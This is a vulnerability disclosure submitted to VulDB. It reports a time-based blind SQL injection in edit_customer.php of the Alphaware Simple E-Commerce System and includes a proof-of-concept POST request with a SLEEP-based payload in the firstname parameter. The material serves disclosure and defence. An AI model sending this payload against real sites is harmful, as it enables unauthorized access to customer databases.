| タイトル | Alphaware Simple E-Commerce System edit_customer.php SQL Injection |
|---|
| 説明 | A SQL Injection Vulnerability has been discovered in Alphaware Simple E-Commerce System, and the vulnerable function is account edit, the vulnerable file is edit_customer.php.
Attackers can exploit it by sending a crafted request, the injectable parameters are 'firstname', 'mi' , 'lastname',etc. A time-based blind injection poc is below:
POST /alphaware/function/edit_customer.php HTTP/1.1
***********************************
firstname=a' RLIKE SLEEP(5) AND 'dAbu'='dAbu&mi=a&lastname=a&address=6&country=a&zipcode=a&mobile=123&telephone=a&[email protected]&password=123456&edit=Save Changes
the parameters in firstname=a' RLIKE SLEEP(5) AND 'dAbu'='dAbu&mi=a&lastname=a&address=6&country=a&zipcode=a&mobile=123&telephone=a&[email protected]&password=123456 are all injectable |
|---|
| ソース | ⚠️ https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |
|---|
| ユーザー | WWesleywww (UID 43117) |
|---|
| 送信 | 2023年03月20日 07:27 (3 年 ago) |
|---|
| モデレーション | 2023年03月20日 08:28 (1 hour later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 223406 [SourceCodester Alphaware Simple E-Commerce System 1.0 edit_customer.php firstname/mi/lastname SQLインジェクション] |
|---|
| ポイント | 20 |
|---|